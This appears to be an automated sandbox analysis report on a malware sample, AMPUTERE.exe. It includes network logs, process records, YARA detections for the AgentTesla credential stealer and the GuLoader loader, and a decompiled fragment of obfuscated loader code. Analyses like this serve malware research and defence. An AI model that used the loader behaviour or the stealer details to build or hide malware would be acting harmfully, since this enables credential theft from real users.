Apr 1, 2021 07:41:57.323487997 CEST	53	56061	8.8.8.8	192.168.2.6
Apr 1, 2021 07:41:58.575582027 CEST	58336	53	192.168.2.6	8.8.8.8
Apr 1, 2021 07:41:58.622155905 CEST	53	58336	8.8.8.8	192.168.2.6
Apr 1, 2021 07:41:59.844504118 CEST	53781	53	192.168.2.6	8.8.8.8
Apr 1, 2021 07:41:59.893209934 CEST	53	53781	8.8.8.8	192.168.2.6
Apr 1, 2021 07:42:04.149950981 CEST	54064	53	192.168.2.6	8.8.8.8
Apr 1, 2021 07:42:04.195872068 CEST	53	54064	8.8.8.8	192.168.2.6
Apr 1, 2021 07:42:05.189529896 CEST	52811	53	192.168.2.6	8.8.8.8
Apr 1, 2021 07:42:05.237653017 CEST	53	52811	8.8.8.8	192.168.2.6
Apr 1, 2021 07:42:07.419472933 CEST	55299	53	192.168.2.6	8.8.8.8
Apr 1, 2021 07:42:07.465405941 CEST	53	55299	8.8.8.8	192.168.2.6
Apr 1, 2021 07:42:08.486334085 CEST	63745	53	192.168.2.6	8.8.8.8
Apr 1, 2021 07:42:08.532182932 CEST	53	63745	8.8.8.8	192.168.2.6
Apr 1, 2021 07:42:09.296761036 CEST	50055	53	192.168.2.6	8.8.8.8
Apr 1, 2021 07:42:09.344470978 CEST	53	50055	8.8.8.8	192.168.2.6
Apr 1, 2021 07:42:11.085506916 CEST	61374	53	192.168.2.6	8.8.8.8
Apr 1, 2021 07:42:11.141558886 CEST	53	61374	8.8.8.8	192.168.2.6
Apr 1, 2021 07:42:33.522531986 CEST	50339	53	192.168.2.6	8.8.8.8
Apr 1, 2021 07:42:33.589736938 CEST	53	50339	8.8.8.8	192.168.2.6
Apr 1, 2021 07:42:35.327601910 CEST	63307	53	192.168.2.6	8.8.8.8
Apr 1, 2021 07:42:35.482263088 CEST	53	63307	8.8.8.8	192.168.2.6
Apr 1, 2021 07:42:36.180342913 CEST	49694	53	192.168.2.6	8.8.8.8
Apr 1, 2021 07:42:36.237016916 CEST	53	49694	8.8.8.8	192.168.2.6
Apr 1, 2021 07:42:37.043318987 CEST	54982	53	192.168.2.6	8.8.8.8
Apr 1, 2021 07:42:37.097539902 CEST	53	54982	8.8.8.8	192.168.2.6
Apr 1, 2021 07:42:37.534673929 CEST	50010	53	192.168.2.6	8.8.8.8
Apr 1, 2021 07:42:37.628061056 CEST	53	50010	8.8.8.8	192.168.2.6
Apr 1, 2021 07:42:38.209295988 CEST	63718	53	192.168.2.6	8.8.8.8
Apr 1, 2021 07:42:38.255273104 CEST	53	63718	8.8.8.8	192.168.2.6
Apr 1, 2021 07:42:38.802638054 CEST	62116	53	192.168.2.6	8.8.8.8
Apr 1, 2021 07:42:38.859879017 CEST	53	62116	8.8.8.8	192.168.2.6
Apr 1, 2021 07:42:39.162408113 CEST	63816	53	192.168.2.6	8.8.8.8
Apr 1, 2021 07:42:39.230982065 CEST	53	63816	8.8.8.8	192.168.2.6
Apr 1, 2021 07:42:39.300668955 CEST	55014	53	192.168.2.6	8.8.8.8
Apr 1, 2021 07:42:39.355036974 CEST	53	55014	8.8.8.8	192.168.2.6
Apr 1, 2021 07:42:40.345225096 CEST	62208	53	192.168.2.6	8.8.8.8
Apr 1, 2021 07:42:40.391186953 CEST	53	62208	8.8.8.8	192.168.2.6
Apr 1, 2021 07:42:41.812714100 CEST	57574	53	192.168.2.6	8.8.8.8
Apr 1, 2021 07:42:41.859698057 CEST	53	57574	8.8.8.8	192.168.2.6
Apr 1, 2021 07:42:42.381419897 CEST	51818	53	192.168.2.6	8.8.8.8
Apr 1, 2021 07:42:42.437664986 CEST	53	51818	8.8.8.8	192.168.2.6
Apr 1, 2021 07:42:56.505729914 CEST	56628	53	192.168.2.6	8.8.8.8
Apr 1, 2021 07:42:56.561142921 CEST	53	56628	8.8.8.8	192.168.2.6
Apr 1, 2021 07:43:14.194900990 CEST	60778	53	192.168.2.6	8.8.8.8
Apr 1, 2021 07:43:14.252999067 CEST	53	60778	8.8.8.8	192.168.2.6
Apr 1, 2021 07:43:22.684170961 CEST	53799	53	192.168.2.6	8.8.8.8
Apr 1, 2021 07:43:22.733340979 CEST	53	53799	8.8.8.8	192.168.2.6
Apr 1, 2021 07:43:28.743518114 CEST	54683	53	192.168.2.6	8.8.8.8
Apr 1, 2021 07:43:28.814992905 CEST	53	54683	8.8.8.8	192.168.2.6
Apr 1, 2021 07:45:25.612718105 CEST	59329	53	192.168.2.6	8.8.8.8
Apr 1, 2021 07:45:25.678809881 CEST	53	59329	8.8.8.8	192.168.2.6
Apr 1, 2021 07:45:26.367213011 CEST	64021	53	192.168.2.6	8.8.8.8
Apr 1, 2021 07:45:26.431298018 CEST	53	64021	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Apr 1, 2021 07:45:26.367213011 CEST	192.168.2.6	8.8.8.8	0xfc91	Standard query (0)	doc-14-a0-docs.googleusercontent.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Apr 1, 2021 07:45:26.431298018 CEST	8.8.8.8	192.168.2.6	0xfc91	No error (0)	doc-14-a0-docs.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)
Apr 1, 2021 07:45:26.431298018 CEST	8.8.8.8	192.168.2.6	0xfc91	No error (0)	googlehosted.l.googleusercontent.com		216.58.215.225	A (IP address)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Apr 1, 2021 07:45:26.534079075 CEST	216.58.215.225	443	192.168.2.6	49747	CN=*.googleusercontent.com, O=Google LLC, L=Mountain View, ST=California, C=US CN=GTS CA 1O1, O=Google Trust Services, C=US	CN=GTS CA 1O1, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2	Tue Mar 16 20:32:57 CET 2021 Thu Jun 15 02:00:42 CEST 2017	Tue Jun 08 21:32:56 CEST 2021 Wed Dec 15 01:00:42 CET 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
Apr 1, 2021 07:45:26.534079075 CEST	216.58.215.225	443	192.168.2.6	49747	CN=GTS CA 1O1, O=Google Trust Services, C=US	CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2	Thu Jun 15 02:00:42 CEST 2017	Wed Dec 15 01:00:42 CET 2021		37f463bf4616ecd445d4a1937da06e19

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: AMPUTERE.exe PID: 6608 Parent PID: 5964

General

Start time:	07:41:46
Start date:	01/04/2021
Path:	C:\Users\user\Desktop\AMPUTERE.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\AMPUTERE.exe'
Imagebase:	0x400000
File size:	90112 bytes
MD5 hash:	F2FA3C87DE32858F1244FB352873F399
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	low

Chronological Activities

Analysis Process: RegAsm.exe PID: 6044 Parent PID: 6608

General

Start time:	07:45:13
Start date:	01/04/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\AMPUTERE.exe'
Imagebase:	0xd30000
File size:	53248 bytes
MD5 hash:	529695608EAFBED00ACA9E61EF333A7C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.864518316.000000001DEE1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.864518316.000000001DEE1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader, Description: Yara detected GuLoader, Source: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 1212 Parent PID: 6044

General

Start time:	07:45:13
Start date:	01/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff614b90000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: AMPUTERE.exe PID: 6608 Parent PID: 5964 AMPUTERE.exeCOMMON

Executed Functions

Function 0040943F, Relevance: 19.0, APIs: 1, Strings: 11, Instructions: 989COMMON

Download Yara Rule

Strings

L, xrefs: 00409BBA
9, xrefs: 00409BC0
u, xrefs: 00409BBD
c, xrefs: 004097BA
?, xrefs: 00409861
F, xrefs: 004099FA
V, xrefs: 0040962B
(, xrefs: 00409A86
#, xrefs: 00409743
1, xrefs: 0040951C
J, xrefs: 0040997F

Memory Dump Source

Source File: 00000000.00000002.810803883.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.810789403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.810825715.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.810833136.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: #$($1$9$?$F$J$L$V$c$u
API String ID: 0-4198092267
Opcode ID: fa54085b81f5c5a563b4b80b218a425f5cc50a7b50f0e1248816f7e819274042
Instruction ID: b14047e45a6c8972ed452ba81ebd8fa46cfb846fd4dcd22c28b76621f0ba2834
Opcode Fuzzy Hash: fa54085b81f5c5a563b4b80b218a425f5cc50a7b50f0e1248816f7e819274042
Instruction Fuzzy Hash: BC52DC81A6A34289FF732120C5E076D6690DF16785F308F37C861F69E2EA1FC9CA1597

Uniqueness

Uniqueness Score: -1.00%

Function 004094B0, Relevance: 19.0, APIs: 1, Strings: 11, Instructions: 987memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AA68

Strings

L, xrefs: 00409BBA
9, xrefs: 00409BC0
u, xrefs: 00409BBD
c, xrefs: 004097BA
?, xrefs: 00409861
F, xrefs: 004099FA
V, xrefs: 0040962B
(, xrefs: 00409A86
#, xrefs: 00409743
1, xrefs: 0040951C
J, xrefs: 0040997F

Memory Dump Source

Source File: 00000000.00000002.810803883.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.810789403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.810825715.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.810833136.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: #$($1$9$?$F$J$L$V$c$u
API String ID: 4275171209-4198092267
Opcode ID: 52c2e92fdcee5466589c24f6865e2c70c509eafc9a060465fd4ef066f46191e6
Instruction ID: 3a0ced1613888021dc3707ec959ca4c5e062b433479989860f98359d6fab277f
Opcode Fuzzy Hash: 52c2e92fdcee5466589c24f6865e2c70c509eafc9a060465fd4ef066f46191e6
Instruction Fuzzy Hash: 2042DC82A2A30689FF722120C5E076D5690DF16785F308F37D861F59E2FA2FC9CA1597

Uniqueness

Uniqueness Score: -1.00%

Function 00409418, Relevance: 19.0, APIs: 1, Strings: 11, Instructions: 986COMMON

Download Yara Rule

Strings

L, xrefs: 00409BBA
9, xrefs: 00409BC0
u, xrefs: 00409BBD
c, xrefs: 004097BA
?, xrefs: 00409861
F, xrefs: 004099FA
V, xrefs: 0040962B
(, xrefs: 00409A86
#, xrefs: 00409743
1, xrefs: 0040951C
J, xrefs: 0040997F

Memory Dump Source

Source File: 00000000.00000002.810803883.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.810789403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.810825715.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.810833136.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: #$($1$9$?$F$J$L$V$c$u
API String ID: 0-4198092267
Opcode ID: d7c3ba78aba9b505a9007fbfd43ea8e11e811e66f624d2cd2aeb097ac6e2509f
Instruction ID: 1f12b67b4787fc7c51790023974913a79baf8a376b2deeae74e2e97a69b78443
Opcode Fuzzy Hash: d7c3ba78aba9b505a9007fbfd43ea8e11e811e66f624d2cd2aeb097ac6e2509f
Instruction Fuzzy Hash: 9552EE82A2A34289FF732120C5E075D6690DF16785F308F37C861F69E2FA1F89CA1597

Uniqueness

Uniqueness Score: -1.00%

Function 004095BE, Relevance: 17.4, APIs: 1, Strings: 10, Instructions: 932memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AA68

Strings

L, xrefs: 00409BBA
9, xrefs: 00409BC0
u, xrefs: 00409BBD
c, xrefs: 004097BA
?, xrefs: 00409861
F, xrefs: 004099FA
V, xrefs: 0040962B
(, xrefs: 00409A86
#, xrefs: 00409743
J, xrefs: 0040997F

Memory Dump Source

Source File: 00000000.00000002.810803883.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.810789403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.810825715.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.810833136.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: #$($9$?$F$J$L$V$c$u
API String ID: 4275171209-98720746
Opcode ID: 62fd13da78d5d409536b40c8aae2b41d3c27985c7ab58e328c3a12197914ebcd
Instruction ID: 02cbb55d048a94842e5bb81c01554ffffb41d24b8eb4bc5e2c934cc28b52e069
Opcode Fuzzy Hash: 62fd13da78d5d409536b40c8aae2b41d3c27985c7ab58e328c3a12197914ebcd
Instruction Fuzzy Hash: A942DC82A6A30689EF722120C5E076D6690DF16781F308F37D861F59E2FA1FC9CA1597

Uniqueness

Uniqueness Score: -1.00%

Function 00409588, Relevance: 17.4, APIs: 1, Strings: 10, Instructions: 930memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AA68

Strings

L, xrefs: 00409BBA
9, xrefs: 00409BC0
u, xrefs: 00409BBD
c, xrefs: 004097BA
?, xrefs: 00409861
F, xrefs: 004099FA
V, xrefs: 0040962B
(, xrefs: 00409A86
#, xrefs: 00409743
J, xrefs: 0040997F

Memory Dump Source

Source File: 00000000.00000002.810803883.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.810789403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.810825715.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.810833136.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: #$($9$?$F$J$L$V$c$u
API String ID: 4275171209-98720746
Opcode ID: 582872af22e205d31543747540da36b272b14d6bf6d79001bff8f3b6a59c0cdc
Instruction ID: d15512728f07e3c67b5f852f10812371c2d8dc882e99fd2a0c606be184cc203d
Opcode Fuzzy Hash: 582872af22e205d31543747540da36b272b14d6bf6d79001bff8f3b6a59c0cdc
Instruction Fuzzy Hash: 0142DC82A6A30689FF722120C5E076D5690DF16781F308F37D861F59E2FA1FC9CA1597

Uniqueness

Uniqueness Score: -1.00%

Function 00409649, Relevance: 16.0, APIs: 1, Strings: 9, Instructions: 978memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AA68

Strings

L, xrefs: 00409BBA
9, xrefs: 00409BC0
u, xrefs: 00409BBD
c, xrefs: 004097BA
?, xrefs: 00409861
F, xrefs: 004099FA
(, xrefs: 00409A86
#, xrefs: 00409743
J, xrefs: 0040997F

Memory Dump Source

Source File: 00000000.00000002.810803883.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.810789403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.810825715.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.810833136.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: #$($9$?$F$J$L$c$u
API String ID: 4275171209-118773416
Opcode ID: 580cdde82f29c864c8184d6b6429020d173af25f650688bfd4dd82a19f951d1d
Instruction ID: dd8f963246411d75d6fba831522a93725ba69479646fb59d9458fb625063ad35
Opcode Fuzzy Hash: 580cdde82f29c864c8184d6b6429020d173af25f650688bfd4dd82a19f951d1d
Instruction Fuzzy Hash: B742DC82A6A30689FF722120C5E076D5690DF16781F308F37D862F59E2FA1FC9CA1597

Uniqueness

Uniqueness Score: -1.00%

Function 004096D5, Relevance: 16.0, APIs: 1, Strings: 9, Instructions: 962COMMON

Download Yara Rule

Strings

L, xrefs: 00409BBA
9, xrefs: 00409BC0
u, xrefs: 00409BBD
c, xrefs: 004097BA
?, xrefs: 00409861
F, xrefs: 004099FA
(, xrefs: 00409A86
#, xrefs: 00409743
J, xrefs: 0040997F

Memory Dump Source

Source File: 00000000.00000002.810803883.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.810789403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.810825715.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.810833136.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: #$($9$?$F$J$L$c$u
API String ID: 0-118773416
Opcode ID: 59e0dffb5534087c228dacefaa5aeaeb9c32a48f31af9794025bcd78f092bb8c
Instruction ID: 2ed3b2feeb0593b5c49b069a9a31b7475491bbdc9630f75121818ee543858a98
Opcode Fuzzy Hash: 59e0dffb5534087c228dacefaa5aeaeb9c32a48f31af9794025bcd78f092bb8c
Instruction Fuzzy Hash: 2F42DD81A6A30689FF722120C5D076D5690DF16781F308F37D862F59E2FA1FC9CA1597

Uniqueness

Uniqueness Score: -1.00%

Function 00409762, Relevance: 14.5, APIs: 1, Strings: 8, Instructions: 951memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AA68

Strings

L, xrefs: 00409BBA
9, xrefs: 00409BC0
u, xrefs: 00409BBD
c, xrefs: 004097BA
?, xrefs: 00409861
F, xrefs: 004099FA
(, xrefs: 00409A86
J, xrefs: 0040997F

Memory Dump Source

Source File: 00000000.00000002.810803883.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.810789403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.810825715.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.810833136.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: ($9$?$F$J$L$c$u
API String ID: 4275171209-2803890806
Opcode ID: 6db04cc294f32e1365d5883c67c27129767780e53abccdb14dcfaaf740630ec2
Instruction ID: c11f2ca1e9a9d421c91bfbd485418400436fe8b8157f51ae2788369519a31244
Opcode Fuzzy Hash: 6db04cc294f32e1365d5883c67c27129767780e53abccdb14dcfaaf740630ec2
Instruction Fuzzy Hash: EC32DD81A6A30689FF722060C5D076D6690DF16781F308F37D862F59E2FA1FC9CA1597

Uniqueness

Uniqueness Score: -1.00%

Function 004097F4, Relevance: 12.9, APIs: 1, Strings: 7, Instructions: 877memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AA68

Strings

L, xrefs: 00409BBA
9, xrefs: 00409BC0
u, xrefs: 00409BBD
?, xrefs: 00409861
F, xrefs: 004099FA
(, xrefs: 00409A86
J, xrefs: 0040997F

Memory Dump Source

Source File: 00000000.00000002.810803883.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.810789403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.810825715.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.810833136.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: ($9$?$F$J$L$u
API String ID: 4275171209-1256842322
Opcode ID: 446f06615ca91f79a741d795ffb2531efd090726b4d3f210f802102dbecc9890
Instruction ID: 32ba69de9ead252178d91b59e5cdc913b8a188260d77696cde9b8dcc7972ae0d
Opcode Fuzzy Hash: 446f06615ca91f79a741d795ffb2531efd090726b4d3f210f802102dbecc9890
Instruction Fuzzy Hash: 8E32DE81A6A30689FF722120C5D076D6690DF16781F308F37D862F59E2FA1FC9CA1597

Uniqueness

Uniqueness Score: -1.00%

Function 00409918, Relevance: 11.4, APIs: 1, Strings: 6, Instructions: 896memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AA68

Strings

L, xrefs: 00409BBA
9, xrefs: 00409BC0
u, xrefs: 00409BBD
F, xrefs: 004099FA
(, xrefs: 00409A86
J, xrefs: 0040997F

Memory Dump Source

Source File: 00000000.00000002.810803883.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.810789403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.810825715.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.810833136.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: ($9$F$J$L$u
API String ID: 4275171209-3224504738
Opcode ID: c9141c155b2159da2c334c5823fa8d9595a8555c6d0f113e66cd7de082579700
Instruction ID: c56777e1790f66dcc8d3f1b38545b2ff9b014707244632226d87888fbe28601c
Opcode Fuzzy Hash: c9141c155b2159da2c334c5823fa8d9595a8555c6d0f113e66cd7de082579700
Instruction Fuzzy Hash: 8932DD81A6A30689FF722060C5D076D6690DF16781F308F37D862F59E2FA2FC9CA1597

Uniqueness

Uniqueness Score: -1.00%

Function 00409886, Relevance: 11.3, APIs: 1, Strings: 6, Instructions: 846memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AA68

Strings

L, xrefs: 00409BBA
9, xrefs: 00409BC0
u, xrefs: 00409BBD
F, xrefs: 004099FA
(, xrefs: 00409A86
J, xrefs: 0040997F

Memory Dump Source

Source File: 00000000.00000002.810803883.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.810789403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.810825715.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.810833136.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: ($9$F$J$L$u
API String ID: 4275171209-3224504738
Opcode ID: 42f7c95d35bae5de9c1698f7ac07d14f2cb7e76fe3bc95c06fe9b61de8eefb1b
Instruction ID: bf68ace991b56d70c93faf9a253821d033e009580464bcbd15e7f93c0dd4504c
Opcode Fuzzy Hash: 42f7c95d35bae5de9c1698f7ac07d14f2cb7e76fe3bc95c06fe9b61de8eefb1b
Instruction Fuzzy Hash: 9132EE81A6A30689FF726020C5D076D6650DF16785F308F37D861F58E2FA2FC9CA1597

Uniqueness

Uniqueness Score: -1.00%

Function 004099A6, Relevance: 8.3, APIs: 1, Strings: 4, Instructions: 811memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AA68

Strings

L, xrefs: 00409BBA
9, xrefs: 00409BC0
u, xrefs: 00409BBD
(, xrefs: 00409A86

Memory Dump Source

Source File: 00000000.00000002.810803883.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.810789403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.810825715.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.810833136.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: ($9$L$u
API String ID: 4275171209-3596950922
Opcode ID: 220a4378579b9617119d981e8c38dba18cda3d85a75ba350405592eb8fe57a4c
Instruction ID: 15824e5b1fdffa86e16dec1d1036c10c4720a3f1da17144efb6b3ab63e1ef334
Opcode Fuzzy Hash: 220a4378579b9617119d981e8c38dba18cda3d85a75ba350405592eb8fe57a4c
Instruction Fuzzy Hash: E032DD81A6A30689FF722060C5D076D6590DF16781F308F37D862F59E2FA2FCACA1597

Uniqueness

Uniqueness Score: -1.00%

Function 00409A2C, Relevance: 6.8, APIs: 1, Strings: 3, Instructions: 824
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 77%

			E00409A2C(void* __eax, void* __ebx, signed int __ecx, void* __edi, void* __esi, void* __fp0) {
				signed char _t17;
				signed int _t18;
				void* _t24;
				void* _t45;
				void* _t49;
				void* _t414;

				_t414 = __fp0;
				_t49 = __esi;
				_t45 = __edi;
				_t24 = __ebx;
				_t17 = __eax - 1;
				 *_t17 =  *_t17 | __ecx;
				 *_t17 =  *_t17 | __ecx;
				 *_t17 =  *_t17 | __ecx;
				 *_t17 =  *_t17 | __ecx;
				 *_t17 =  *_t17 | __ecx;
				 *_t17 =  *_t17 | __ecx;
				 *_t17 =  *_t17 | __ecx;
				 *_t17 =  *_t17 | __ecx;
				 *_t17 =  *_t17 | __ecx;
				 *_t17 =  *_t17 | __ecx;
				 *_t17 =  *_t17 | __ecx;
				 *_t17 =  *_t17 | __ecx;
				 *_t17 =  *_t17 | __ecx;
				 *_t17 =  *_t17 | __ecx;
				 *_t17 =  *_t17 | __ecx;
				 *_t17 =  *_t17 | __ecx;
				 *_t17 =  *_t17 | __ecx;
				 *_t17 =  *_t17 | __ecx;
				 *_t17 =  *_t17 | __ecx;
				 *_t17 =  *_t17 | __ecx;
				 *_t17 =  *_t17 | __ecx;
				 *_t17 =  *_t17 | __ecx;
				 *_t17 =  *_t17 | __ecx;
				 *_t17 =  *_t17 | __ecx;
				 *_t17 =  *_t17 | __ecx;
				 *_t17 =  *_t17 | __ecx;
				 *_t17 =  *_t17 | __ecx;
				 *_t17 =  *_t17 | __ecx;
				 *_t17 =  *_t17 | __ecx;
				 *_t17 =  *_t17 | __ecx;
				 *_t17 =  *_t17 | __ecx;
				 *_t17 =  *_t17 | __ecx;
				 *_t17 =  *_t17 | __ecx;
				 *_t17 =  *_t17 | __ecx;
				 *_t17 =  *_t17 | __ecx;
				 *_t17 =  *_t17 | __ecx;
				 *_t17 =  *_t17 | __ecx;
				 *_t17 =  *_t17 | __ecx;
				 *_t17 =  *_t17 | __ecx;
				 *_t17 =  *_t17 | __ecx;
				 *_t17 =  *_t17 | __ecx;
				 *_t17 =  *_t17 | __ecx;
				 *(__ebx - 0x47cfd08) =  *(__ebx - 0x47cfd08) | _t17;
				asm("fucom st1");
				asm("fabs");
				asm("fsubp st5, st0");
				asm("fst st1");
				asm("psrld mm4, 0xc0");
				asm("pand mm5, mm4");
				asm("packssdw xmm6, xmm4");
				asm("ffree st7");
				asm("fclex");
				asm("fninit");
				asm("paddw xmm1, xmm4");
				goto L4;
				_t18 =  *_t17;
			}

0x00409a2c
0x00409a2c
0x00409a2c
0x00409a2c
0x00409a2c
0x00409a2e
0x00409a30
0x00409a32
0x00409a34
0x00409a36
0x00409a38
0x00409a3a
0x00409a3c
0x00409a3e
0x00409a40
0x00409a42
0x00409a44
0x00409a46
0x00409a48
0x00409a4a
0x00409a4c
0x00409a4e
0x00409a50
0x00409a52
0x00409a54
0x00409a56
0x00409a58
0x00409a5a
0x00409a5c
0x00409a5e
0x00409a60
0x00409a62
0x00409a64
0x00409a66
0x00409a68
0x00409a6a
0x00409a6c
0x00409a6e
0x00409a70
0x00409a72
0x00409a74
0x00409a76
0x00409a78
0x00409a7a
0x00409a7c
0x00409a7e
0x00409a80
0x00409a82
0x00409aa2
0x00409aa4
0x00409aa6
0x00409aa8
0x00409aaa
0x00409aae
0x00409ab1
0x00409ab5
0x00409ab7
0x00409b40
0x00409b42
0x00409b42
0x00409bac

APIs

VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AA68

Strings

L, xrefs: 00409BBA
9, xrefs: 00409BC0
u, xrefs: 00409BBD

Memory Dump Source

Source File: 00000000.00000002.810803883.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.810789403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.810825715.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.810833136.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: 9$L$u
API String ID: 4275171209-3980657970
Opcode ID: 5f8732593e282c048a8b668fcfbfe260628af55ca69a206a819cd1b92efca601
Instruction ID: 094e4f964baf2c3cd4517cfa75f442d762f8fdb7eb55f52c0d1ece32dc0cdbfc
Opcode Fuzzy Hash: 5f8732593e282c048a8b668fcfbfe260628af55ca69a206a819cd1b92efca601
